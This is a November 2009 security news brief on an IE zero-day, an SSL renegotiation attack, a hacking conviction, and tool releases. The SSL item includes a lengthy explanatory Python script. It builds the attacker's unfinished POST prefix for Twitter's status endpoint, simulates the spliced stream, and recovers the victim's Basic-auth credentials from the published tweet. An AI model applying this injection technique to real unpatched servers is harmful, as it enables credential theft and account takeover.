Infosecurity US weekly brief - November 23, 2009

A zero-day vulnerability has been reported in Internet Explorer that can allow attackers to execute arbitrary code on a visitor's machine by luring them to a malicious web page. Internet Explorer 6 and 7 are affected by the exploit, which targets the way IE handles cascading style sheets (CSS).

It's been a bad week for Internet Explorer in general. The Register reports that a flaw in Internet Explorer 8 can be used to introduce cross-site scripting into otherwise-safe web pages.

Researchers have already worked out how to exploit the SSL renegotiation bug that PhoneFactor disclosed earlier this month. Anil Kurmus, a Turkish graduate student, demonstrated how it can be used to steal Twitter login credentials carried inside encrypted sessions.
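The mechanism behind the Twitter attack, as an added illustration (this is editor-written Python, not code from the article or from Kurmus): with the renegotiation flaw, a server treats the application data an attacker sent before a renegotiation and the data the victim sends after it as one continuous stream. The attacker therefore sends an unfinished HTTP POST whose body begins with `status=`, and the victim's own request, Basic-auth header included, becomes the rest of that body and is published as a tweet. The endpoint paths, the sample user and password, and all traffic below are constructed for the example; the server model is a minimal HTTP/1.1 reader, not Twitter's real front end.

```python
import base64
import re

# Constructed sample traffic, not a capture. The victim authenticates the way
# Twitter's API did in 2009: a Basic-auth Authorization header on every request.


def build_attacker_prefix(content_length=140):
    """Application data the attacker sends over its own TLS session just before
    handing the connection to the victim via renegotiation. The request is
    deliberately unfinished: the body starts with 'status=' and has no
    terminator, so whatever bytes the server receives next complete it."""
    return (
        b"POST /statuses/update.xml HTTP/1.1\r\n"   # hypothetical endpoint
        b"Host: twitter.com\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n"
        b"Content-Length: %d\r\n"
        b"\r\n"
        b"status=" % content_length
    )


def build_victim_request(user, password):
    """The victim's own request, sent over the renegotiated session. It carries
    the Basic-auth header the attacker is after."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return (
        b"GET /home HTTP/1.1\r\n"
        b"Host: twitter.com\r\n"
        b"Authorization: Basic " + token.encode() + b"\r\n"
        b"\r\n"
    )


def parse_first_request(stream):
    """Minimal model of an HTTP/1.1 server reading one request off a
    connection: request line, headers, then Content-Length bytes of body.
    Returns whatever body bytes are already available; a real server would keep
    waiting for the rest, which the victim's next keep-alive requests supply."""
    head, _, rest = stream.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get(b"content-length", b"0"))
    return {"method": method, "path": path, "headers": headers, "body": rest[:length]}


BASIC_RE = re.compile(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)")


def extract_basic_credentials(blob):
    """Pull the first Basic-auth token out of an arbitrary byte blob (here: the
    published tweet) and decode it. Returns (user, password) or None."""
    match = BASIC_RE.search(blob)
    if not match:
        return None
    user, _, password = base64.b64decode(match.group(1)).decode().partition(":")
    return user, password


def run_attack(user="victim", password="s3cret"):
    """Reproduce the splice: the server sees attacker bytes + victim bytes as a
    single stream, so the victim's request lands in the body of the attacker's
    POST and the credentials come back out of the posted status text."""
    stream = build_attacker_prefix() + build_victim_request(user, password)
    request = parse_first_request(stream)
    return request, extract_basic_credentials(request["body"])


if __name__ == "__main__":
    req, creds = run_attack()
    print(req["method"].decode(), req["path"].decode())
    print("posted status:", req["body"].decode())
    print("recovered credentials:", creds)
```

Note that the attacker never decrypts anything: the victim's bytes stay encrypted end to end, and the server itself republishes them. The fix that later shipped as RFC 5746 binds renegotiations to the previous handshake so the two halves of the stream cannot be spliced; on a patched server `openssl s_client -connect host:443` reports "Secure Renegotiation IS supported", which is the quick check to run.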

40-year-old Steven Jinwoo Kim has been convicted of hacking the computer systems of GEXA Energy, his former employer. He cost GEXA at least $100,000, according to reports. He faces up to five years in jail and a maximum $250,000 fine.

The city of Edmonton, Alberta, has lost an average of one mobile device per month over the past four years, according to a report [pdf] from its Auditor.

Intelligence industry-backed venture capital fund In-Q-Tel has invested in west coast firm FireEye, which was recently responsible for taking down the Mega-D botnet.

Another release of Windows, another conspiracy theory. Microsoft is insisting that it didn't build a backdoor in Windows 7 for the National Security Agency. NSA executives said that they had worked with the OS vendor to "enhance Microsoft's operating system security guide". This isn't the first time that Microsoft has been accused of such shenanigans. A CNN story from 1999 alleged the same thing.

Legislation has been introduced that would prohibit the use of peer-to-peer filesharing software on federal networks. The House Oversight and Government Reform Committee introduced the Secure Federal File Sharing Act to lock down the use of such software after sensitive information from a congressional investigation leaked from a government worker's home PC.

Metasploit version 3.3 is out, with over 180 bug fixes, Windows 7 compatibility, and Oracle exploit support.

Version 23 of [In]Secure magazine [PDF] is out.

The Katana 1.0 portable multi-boot security suite is out. It bundles a number of security distributions on one bootable USB drive, including BackTrack and the OSWA-Assistant (Organizational Systems Wireless Auditor Assistant), along with over 100 portable Windows security applications.

WhiteHat Security has said that nearly two-thirds of websites have at least one critical security issue.